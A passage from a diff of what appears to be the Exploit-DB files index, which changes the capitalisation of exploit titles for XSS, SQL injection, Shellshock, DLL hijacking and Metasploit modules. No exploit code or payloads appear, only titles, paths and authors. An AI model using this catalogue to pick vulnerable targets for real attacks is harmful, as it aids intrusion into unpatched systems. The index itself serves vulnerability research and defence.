Clone Script - 'index.php' msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 -34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script - lostpassword.php msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 +34774,platforms/php/webapps/34774.txt,"HotScripts Type PHP Clone Script - feedback.php msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 +34775,platforms/php/webapps/34775.txt,"HotScripts Type PHP Clone Script - 'index.php' msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 +34776,platforms/php/webapps/34776.txt,"HotScripts Type PHP Clone Script - lostpassword.php msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 34777,platforms/cgi/remote/34777.rb,"GNU Bash - Environment Variable Command Injection (Metasploit)",2014-09-25,"Shaun Colley",cgi,remote,0 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 @@ -31338,7 +31341,7 @@ id,file,description,date,author,platform,type,port 34786,platforms/php/webapps/34786.txt,"eCardMAX - Multiple Cross-Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0 34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - manager/index.php modahsh Parameter Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0 34788,platforms/php/webapps/34788.txt,"MODx manager - /controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 -34789,platforms/php/webapps/34789.html,"GetSimple CMS 2.01 - 'admin/changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0 +34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'admin/changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34791,platforms/php/webapps/34791.txt,"Swinger Club Portal - start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 34792,platforms/php/webapps/34792.txt,"Swinger Club Portal - start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0 @@ -31346,9 +31349,9 @@ id,file,description,date,author,platform,type,port 34794,platforms/cgi/webapps/34794.txt,"Intellicom Netbiter webSCADA Products - 'read.cgi' Multiple Remote Security Vulnerabilities",2010-10-01,"Eugene Salov",cgi,webapps,0 34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script - 'index.php' Cross-Site Scripting",2009-07-09,Vrs-hCk,php,webapps,0 34796,platforms/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation",2010-08-03,"Libing Song",multiple,remote,0 -34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e - Cross-Site Scripting",2010-10-04,"Kerem Kocaer",php,webapps,0 +34797,platforms/php/webapps/34797.txt,"Surgemail SurgeWeb 4.3e - Cross-Site Scripting",2010-10-04,"Kerem Kocaer",php,webapps,0 34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' Parameter SQL Injection",2010-09-27,RoAd_KiLlEr,php,webapps,0 -34781,platforms/php/webapps/34781.txt,"Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 +34781,platforms/php/webapps/34781.txt,"WordPress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 34798,platforms/php/webapps/34798.txt,"ITS SCADA Username - SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include",2014-09-29,Vulnerability-Lab,ios,webapps,0 34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0 @@ -31363,9 +31366,9 @@ id,file,description,date,author,platform,type,port 34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)",2014-09-29,"Nate Power",windows,webapps,0 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - Cross-Site Request Forgery",2014-09-29,"Dolev Farhi",php,webapps,446 -34975,platforms/php/webapps/34975.txt,"SEO Tools Plugin for Wordpress 3.0 - 'file' Parameter Directory Traversal",2010-11-08,"John Leitch",php,webapps,0 -34976,platforms/php/webapps/34976.txt,"Wordpress Vodpod Video Gallery 3.1.5 Plugin - 'vodpod_gallery_thumbs.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 -34977,platforms/php/webapps/34977.txt,"Wordpress jRSS Widget Plugin 1.1.1 - 'url' Parameter Information Disclosure",2010-11-08,"John Leitch",php,webapps,0 +34975,platforms/php/webapps/34975.txt,"SEO Tools Plugin for WordPress 3.0 - 'file' Parameter Directory Traversal",2010-11-08,"John Leitch",php,webapps,0 +34976,platforms/php/webapps/34976.txt,"WordPress Vodpod Video Gallery 3.1.5 Plugin - 'vodpod_gallery_thumbs.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 +34977,platforms/php/webapps/34977.txt,"WordPress jRSS Widget Plugin 1.1.1 - 'url' Parameter Information Disclosure",2010-11-08,"John Leitch",php,webapps,0 34827,platforms/php/webapps/34827.txt,"Recipe Script 5.0 - 'First Name' HTML Injection",2009-06-15,"ThE g0bL!N",php,webapps,0 34828,platforms/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",php,webapps,0 34829,platforms/windows/remote/34829.c,"Adobe Dreamweaver CS4 - 'mfc80esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote,0 @@ -31376,7 +31379,7 @@ id,file,description,date,author,platform,type,port 34834,platforms/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 - BPEL Console Cross-Site Scripting",2010-10-12,"Alexander Polyakov",jsp,webapps,0 34835,platforms/windows/remote/34835.py,"e2eSoft VCam - DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote,0 34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 - 'libtidy.dll' DLL Loading Arbitrary Code Execution",2010-10-12,anT!-Tr0J4n,windows,remote,0 -34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component - 'controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0 +34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component - 'Controller' Parameter Local File Inclusion",2010-10-13,jos_ali_joe,php,webapps,0 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator - 'quserex.dll' DLL Loading Arbitrary Code Execution",2010-10-13,anT!-Tr0J4n,windows,remote,0 34839,platforms/cgi/webapps/34839.py,"IPFire - Cgi Web Interface Authenticated Bash Environment Variable Code Injection",2014-10-01,"Claudio Viviani",cgi,webapps,0 34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 @@ -31390,12 +31393,12 @@ id,file,description,date,author,platform,type,port 34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 -34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 - (joblogs.php jobid parameter) SQL Injection",2014-10-02,wishnusakti,php,webapps,80 +34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 - (joblogs.php jobid Parameter) SQL Injection",2014-10-02,wishnusakti,php,webapps,80 34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80 34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 - 'trigger.dll' DLL Loading Arbitrary Code Execution",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0 -34854,platforms/php/webapps/34854.txt,"Wordpress All In One WP Security & Firewall 3.8.3 Plugin - Persistent Cross-Site Scripting",2014-10-02,Vulnerability-Lab,php,webapps,80 +34854,platforms/php/webapps/34854.txt,"WordPress All In One WP Security & Firewall 3.8.3 Plugin - Persistent Cross-Site Scripting",2014-10-02,Vulnerability-Lab,php,webapps,80 34855,platforms/windows/dos/34855.pl,"ALPHA Player 2.4 - '.bmp' Buffer Overflow",2010-10-19,anT!-Tr0J4n,windows,dos,0 -34856,platforms/windows/remote/34856.py,"Kolibri Webserver 2.0 - Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass",2014-10-02,tekwizz123,windows,remote,80 +34856,platforms/windows/remote/34856.py,"Kolibri WebServer 2.0 - Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass",2014-10-02,tekwizz123,windows,remote,80 34857,platforms/windows/dos/34857.txt,"TeamSpeak Client 3.0.14 - Buffer Overflow",2014-10-02,"SpyEye and Christian Galeon",windows,dos,0 34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - Cross-Site Request Forgery",2014-10-02,"Krusty Hack",php,webapps,80 34860,platforms/linux/remote/34860.py,"GNU bash 4.3.11 - Environment Variable dhclient Exploit",2014-10-02,@0x00string,linux,remote,0 @@ -31408,14 +31411,14 @@ id,file,description,date,author,platform,type,port 34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)",2014-10-02,"Pedro Ribeiro",java,remote,80 34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 - DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 -34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plugin - Remote Code Execution",2010-10-19,shinnai,windows,remote,0 +34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla MultiMedia Plugin - Remote Code Execution",2010-10-19,shinnai,windows,remote,0 34871,platforms/php/webapps/34871.txt,"eCardMAX FormXP - 'survey_result.php' Cross-Site Scripting",2009-07-15,Moudi,php,webapps,0 34872,platforms/windows/dos/34872.py,"MASS PLAYER 2.1 - File Processing Remote Denial of Service",2010-10-19,Sweet,windows,dos,0 34873,platforms/php/webapps/34873.txt,"Wap-motor - 'image' Parameter Directory Traversal",2009-08-27,Inj3ct0r,php,webapps,0 -34874,platforms/php/webapps/34874.txt,"SkyBlueCanvas 1.1 r237 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,MaXe,php,webapps,0 +34874,platforms/php/webapps/34874.txt,"Skybluecanvas 1.1 r237 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,MaXe,php,webapps,0 34875,platforms/php/webapps/34875.txt,"QuarkMail - 'tf' Parameter Directory Traversal",2009-08-28,Securitylab.ir,php,webapps,0 34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean - Multiple SQL Injections",2009-08-27,Moudi,php,webapps,0 -34877,platforms/php/webapps/34877.txt,"DigiOz GuestBook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 +34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting",2009-08-27,Moudi,php,webapps,0 34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Remote Exploit (Shellshock)",2014-10-04,"hobbily plunt",linux,remote,0 34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey 3.6.10 / Thunderbird 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote,0 @@ -31432,33 +31435,33 @@ id,file,description,date,author,platform,type,port 34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-Site Scripting",2010-10-21,"Antu Sanadi",php,webapps,0 34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter Cross-Site Scripting",2009-07-20,"599eme Man",php,webapps,0 34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 -34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution Exploit (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 +34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0 34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 -35023,platforms/php/webapps/35023.txt,"Wernhart GuestBook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 +35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 35024,platforms/php/webapps/35024.txt,"Joomla Catalogue Component - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0 34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0 -34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - /riddles/results.php searchquery Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 +34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - /riddles/results.php searchQuery Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - /riddles/list.php catid Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0 34904,platforms/php/webapps/34904.txt,"Radvision Scopia - 'entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0 34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - search.php3 bn Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 34906,platforms/php/webapps/34906.txt,"W-Agora 4.2.1 - search.php bn Parameter Cross-Site Scripting",2010-10-22,MustLive,php,webapps,0 -34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for e-business - ivt/ivtserver parm1 Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34908,platforms/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for e-business - ibm/wpm/acl method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34909,platforms/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for e-business - ibm/wpm/domain method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34910,platforms/multiple/webapps/34910.txt,"IBM Tivoli Access Manager for e-business - ibm/wpm/group method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34911,platforms/multiple/webapps/34911.txt,"IBM Tivoli Access Manager for e-business - ibm/wpm/gso method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34912,platforms/multiple/webapps/34912.txt,"IBM Tivoli Access Manager for e-business - ibm/wpm/gsogroup method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34913,platforms/multiple/webapps/34913.txt,"IBM Tivoli Access Manager for e-business - ibm/wpm/os method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34914,platforms/multiple/webapps/34914.txt,"IBM Tivoli Access Manager for e-business - ibm/wpm/pop method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34915,platforms/multiple/webapps/34915.txt,"IBM Tivoli Access Manager for e-business - ibm/wpm/rule method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34916,platforms/multiple/webapps/34916.txt,"IBM Tivoli Access Manager for e-business - ibm/wpm/user method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34917,platforms/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for e-business - ibm/wpm/webseal method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for E-Business - ivt/ivtserver parm1 Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34908,platforms/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/acl method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34909,platforms/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/domain method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34910,platforms/multiple/webapps/34910.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/group method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34911,platforms/multiple/webapps/34911.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/gso method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34912,platforms/multiple/webapps/34912.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/gsogroup method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34913,platforms/multiple/webapps/34913.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/os method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34914,platforms/multiple/webapps/34914.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/pop method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34915,platforms/multiple/webapps/34915.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/rule method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34916,platforms/multiple/webapps/34916.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/user method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34917,platforms/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/webseal method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 / 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 -34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 - 'admin.php' Directory Traversal",2009-07-16,MaXe,php,webapps,0 +34919,platforms/php/webapps/34919.txt,"Skybluecanvas 1.1 r237 - 'admin.php' Directory Traversal",2009-07-16,MaXe,php,webapps,0 34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure",2014-10-07,"Le Ngoc Son",asp,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 -34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin - Upload",2014-10-09,Metasploit,php,remote,80 +34925,platforms/php/remote/34925.rb,"WordPress InfusionSoft Plugin - Upload",2014-10-09,Metasploit,php,remote,80 34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer - Remote Command Execution",2014-10-09,Metasploit,windows,remote,80 34927,platforms/unix/remote/34927.rb,"F5 iControl - Remote Root Command Execution",2014-10-09,Metasploit,unix,remote,443 34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0 @@ -31471,7 +31474,7 @@ id,file,description,date,author,platform,type,port 34935,platforms/php/webapps/34935.txt,"LES PACKS - 'ID' Parameter SQL Injection",2010-10-27,Cru3l.b0y,php,webapps,0 34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 - 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0 34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0 -34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 - Memory Corruption",2010-10-28,"Jokaim and nSense",windows,dos,0 +34938,platforms/windows/dos/34938.txt,"TeamSpeak 2.0.32.60 - Memory Corruption",2010-10-28,"Jokaim and nSense",windows,dos,0 34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 - Local File Inclusion / Cross-Site Scripting",2010-10-27,MustLive,php,webapps,0 34940,platforms/php/webapps/34940.txt,"212Cafe WebBoard 2.90 Beta - 'view.php' Directory Traversal",2009-05-29,MrDoug,php,webapps,0 34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Parameter Cross-Site Scripting",2009-05-25,SmOk3,php,webapps,0 @@ -31479,7 +31482,7 @@ id,file,description,date,author,platform,type,port 34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",windows,remote,0 34944,platforms/php/webapps/34944.txt,"SmartOptimizer - Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",php,webapps,0 34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal",2010-11-01,"John Leitch",multiple,remote,0 -34946,platforms/php/webapps/34946.txt,"cformsII 11.5/13.1 Plugin for Wordpress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 +34946,platforms/php/webapps/34946.txt,"cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting / SQL Injection",2010-10-30,MustLive,php,webapps,0 34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 - Arbitrary File Upload / Cross-Site Scripting",2010-11-01,ITSecTeam,asp,webapps,0 34949,platforms/multiple/remote/34949.py,"BroadWorks - Call Detail Record Security Bypass",2010-11-02,"Nick Freeman",multiple,remote,0 @@ -31492,11 +31495,11 @@ id,file,description,date,author,platform,type,port 34956,platforms/hardware/webapps/34956.txt,"Bosch Security Systems DVR 630/650/670 Series - Multiple Vulnerabilities",2014-10-14,dun,hardware,webapps,0 34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Authentication Bypass",2014-10-14,Vulnerability-Lab,ios,webapps,0 35022,platforms/php/webapps/35022.txt,"4homepages 4Images 1.7.x - 'categories.php' Parameter SQL Injection",2010-11-29,"Ahmed Atif",php,webapps,0 -34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution Exploit",2014-10-14,LiquidWorm,php,webapps,0 +34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution",2014-10-14,LiquidWorm,php,webapps,0 34959,platforms/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-10-14,LiquidWorm,php,webapps,0 34978,platforms/windows/remote/34978.c,"Silo 2.1.1 - 'wintab32.dll' DLL Loading Arbitrary Code Execution",2010-11-08,"Gjoko Krstic",windows,remote,0 34979,platforms/php/remote/34979.php,"PHP 5.3.x - 'mb_strcut()' Function Information Disclosure",2010-11-07,"Mateusz Kocielski",php,remote,0 -34980,platforms/novell/dos/34980.py,"Novell GroupWise 8.0 - Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",novell,dos,0 +34980,platforms/novell/dos/34980.py,"Novell Groupwise 8.0 - Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",novell,dos,0 34981,platforms/ios/webapps/34981.txt,"Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities",2014-10-15,Vulnerability-Lab,ios,webapps,0 35013,platforms/linux/dos/35013.c,"Linux Kernel 2.6.x - 'inotify_init()' Memory Leak Local Denial of Service",2010-11-24,"Vegard Nossum",linux,dos,0 34965,platforms/php/webapps/34965.txt,"Change CMS 3.6.8 - Multiple Cross-Site Request Forgery Vulnerabilities",2014-10-14,"Krusty Hack",php,webapps,0 @@ -31507,8 +31510,8 @@ id,file,description,date,author,platform,type,port 34970,platforms/php/webapps/34970.py,"SEO Control Panel 3.6.0 - Authenticated SQL Injection",2014-10-14,"Tiago Carvalho",php,webapps,0 34971,platforms/asp/webapps/34971.txt,"Angel Learning Management System 7.3 - 'pdaview.asp' Cross-Site Scripting",2010-11-05,"Wesley Kerfoot",asp,webapps,0 34972,platforms/php/webapps/34972.txt,"Joomla! AutoArticles 3000 - 'id' Parameter SQL Injection",2010-11-05,jos_ali_joe,php,webapps,0 -34973,platforms/php/webapps/34973.txt,"Wordpress FeedList 2.61.01 Plugin - 'handler_image.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 -34974,platforms/php/webapps/34974.txt,"Wordpress WP Survey And Quiz Tool 1.2.1 Plugin - Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 +34973,platforms/php/webapps/34973.txt,"WordPress FeedList 2.61.01 Plugin - 'handler_image.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 +34974,platforms/php/webapps/34974.txt,"WordPress WP Survey And Quiz Tool 1.2.1 Plugin - Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 34982,platforms/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - 'BthPan.sys' Privilege Escalation",2014-10-15,Metasploit,win_x86,local,0 34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0 34995,platforms/php/webapps/34995.txt,"Simea CMS - 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0 @@ -31525,7 +31528,7 @@ id,file,description,date,author,platform,type,port 34997,platforms/windows/remote/34997.txt,"DServe - Multiple Cross-Site Scripting Vulnerabilities",2010-11-16,Axiell,windows,remote,0 34998,platforms/linux/remote/34998.txt,"Eclipse 3.6.1 - Help Server help/index.jsp URI Cross-Site Scripting",2010-11-16,"Aung Khant",linux,remote,0 34999,platforms/linux/remote/34999.txt,"Eclipse 3.6.1 - Help Server help/advanced/content.jsp URI Cross-Site Scripting",2010-11-16,"Aung Khant",linux,remote,0 -35000,platforms/windows/dos/35000.txt,"SAP Netweaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",windows,dos,3200 +35000,platforms/windows/dos/35000.txt,"SAP NetWeaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",windows,dos,3200 35001,platforms/windows/remote/35001.txt,"SAP NetWeaver 7.0 - SQL Monitor Multiple Cross-Site Scripting Vulnerabilities",2010-11-17,a.polyakov,windows,remote,0 35002,platforms/windows/remote/35002.html,"VLC Media Player 1.1.x - Calling Convention Remote Buffer Overflow",2010-11-02,shinnai,windows,remote,0 35003,platforms/multiple/remote/35003.txt,"IBM OmniFind - 'command' Parameter Cross-Site Scripting",2010-11-09,"Fatih Kilic",multiple,remote,0 @@ -31543,7 +31546,7 @@ id,file,description,date,author,platform,type,port 35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 - member.php Multiple Parameter SQL Injection Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 - 'index.php' Multiple Parameter Cross-Site Scripting",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0 -35019,platforms/windows/local/35019.py,"Windows - OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0 +35019,platforms/windows/local/35019.py,"Microsoft Windows - OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0 35020,platforms/win_x86/local/35020.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-060)",2014-10-20,Metasploit,win_x86,local,0 35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation",2014-10-20,Metasploit,linux,local,0 35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Parameter Cross-Site 